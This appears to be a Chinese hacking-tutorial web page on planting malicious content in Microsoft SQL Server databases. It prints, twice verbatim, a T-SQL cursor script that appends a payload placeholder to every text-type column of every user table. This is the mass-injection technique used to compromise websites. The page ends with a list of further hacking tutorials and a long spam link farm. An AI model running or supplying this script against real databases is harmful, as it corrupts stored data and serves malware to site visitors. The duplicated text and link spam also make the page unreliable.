以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。
SQL语句如下:
用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
———————YD的分割——————————–
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’ @T ’] set [’ @C ’]=
rtrim(convert(varchar,[’ @C ’]))
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
———————YD的分割——————————–
SQL语句如下:
用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
———————YD的分割——————————–
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’ @T ’] set [’ @C ’]=
rtrim(convert(varchar,[’ @C ’]))
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
———————YD的分割——————————–
最近发表
- 入侵Oracle数据库常用操作命令 _安全教程_网络安全_
- 教你破解Windows XP登陆口令的方法 _安全教程_网络安全_
- 解析暴库漏洞原理及规律 _安全教程_网络安全_
- 教你如何破别人的ASP木马密码 _安全教程_网络安全_
- WordPress 2.6.1 SQL Column Truncation Vulnerability _安全教程_网络安全_
- 看黑客是如何黑了落伍者的(图) _安全教程_网络安全_
- 基于Windows入门级IDS构建过程详述 _安全教程_网络安全_
- 教你数据库挂马 _安全教程_网络安全_
- PHP漏洞挖掘的一点思路 _安全教程_网络安全_
- ASP注入详细命令40条 _安全教程_网络安全_
- 详细介绍如何捕获网络数据包 _安全教程_网络安全_
- 黑客的脚本漏洞工具分析(图) _安全教程_网络安全_
- 系统漏洞溢出攻击实例(图) _安全教程_网络安全_
- 介绍黑客入侵Windows XP的常用方法 _安全教程_网络安全_
- 教你如何在远程3389终端主机上直接Copy文件 _安全教程_网络安全_
- 最受黑客喜欢的五种网络口令 _安全教程_网络安全_
- 教你phpMyAdmin 后台拿webshell _安全教程_网络安全_
- Tomcat后台拿shell _安全教程_网络安全_
- 百度Hi Csrf蠕虫攻击 _安全教程_网络安全_
- 解析CSRF攻击原理 _安全教程_网络安全_
- 介绍初级黑客常用兵器(图) _安全教程_网络安全_
- 教你如何通过Radmin拿服务器 _安全教程_网络安全_
- 大势至共享文件监控软件、共享文件权限管理软件主控端与客户端的连接设置方法详解_安全教程_网络安全_
- 反垃圾邮件技术之密径追踪(图) _安全教程_网络安全_
- Windows设置系统权限防止病毒入侵的一些经验分享_安全设置_网络安全_
- Linux下禁止UDP发包的脚本代码_安全设置_网络安全_
- Flash Cookie的有效关闭方法以此来避免信息泄露_安全设置_网络安全_
- 如何防止IP信息被泄露 采用隐藏IP的方法可以解决_安全设置_网络安全_
- 十五招提升服务器安全等级_安全设置_网络安全_
- 密码的一些存储方式和安全传输建议_安全设置_网络安全_
友情链接
-
采集程序
网站源码出售
老域名出售页面
下载
游戏
网站导航
文章
源码下载
软件下载
游戏下载
资料
资源分享
六神
六神
海飞丝
海飞丝
噬元兽
噬元兽
bieha.cn
www.bieha.cn
缪缇(Miuti)内衣
缪缇(Miuti)内衣
dk028.com
www.dk028.com
四川福利
四川福利
bzbl.cn
www.bzbl.cn
mlft.cn
www.mlft.cn
7zz压缩
7zz压缩
91大神
91大神
刘亦菲
刘亦菲
sewai.cn
www.sewai.cn
58同城
58同城
鸭苗
鸭苗
caclrc.cn
rgbbs.cn
heiapp.net
zhfjx.cn
sshfy.cn
sxdgc.cn
28city.cn
www.caclrc.cn
www.rgbbs.cn
www.heiapp.net
www.zhfjx.cn
www.sshfy.cn
www.28city.cn
etc吧
etc吧
abdayah.cn
www.abdayah.cn
ddbdzs.cn
www.ddbdzs.cn
安思尔HyFlex
安思尔HyFlex
studyart.cn
www.studyart.cn
dndf.cn
www.dndf.cn
www.sxdgc.cn
11855.cn
www.11855.cn
11566.cn
www.11566.cn
11355.cn
www.11355.cn
62622.cn
www.62622.cn
cbwq.cn
www.cbwq.cn
www.zrqm.cn
zrqm.cn
rlfm.cn
www.rlfm.cn
www.pbtb.cn
pbtb.cn
knlz.cn
www.knlz.cn
rhwf.cn
www.rhwf.cn
dxfp.cn
www.dxfp.cn
rptb.cn
www.rptb.cn
nzjg.cn
www.nzjg.cn
ygnl.cn
www.ygnl.cn
人心不古
人心不古
rfbc.cn
www.rfbc.cn
rwbs.cn
www.rwbs.cn
img.liuyifei.net
drnu.cn
www.drnu.cn
bwsu.cn
www.bwsu.cn
wyim.cn
www.wyim.cn
dtud.cn
www.dtud.cn
远东运输集团
远东运输集团
中宠兽医联盟
中宠兽医联盟
拉贝洛尔
拉贝洛尔
飞行悍马
飞行悍马
uesese.cn
www.uesese.cn
爱坤
爱坤
02613.cn
www.02613.cn
lymzi.cn
www.lymzi.cn
KTOA
KTOA
73216.cn
www.73216.cn
www.crtwd.cn
crtwd.cn
深圳麦迪逊
深圳麦迪逊
kylkc.cn
www.kylkc.cn
dztmd.cn
www.dztmd.cn
pmhlw.cn
www.pmhlw.cn
gfxtk.cn
www.gfxtk.cn
桃子坪村
桃子坪村
京泊汽模
京泊汽模
sh3.cn
www.sh3.cn
7sh.cn
www.7sh.cn
民生人寿
民生人寿
安华农业保险
安华农业保险
华夏基违规操作举报电话
华夏基违规操作举报电话
金融消费权益保护投诉咨询电话
金融消费权益保护投诉咨询电话
钵钵鸡
钵钵鸡
r515.cn
www.r515.cn
g2050.cn
www.g2050.cn
bbc888.com
www.bbc888.com
博客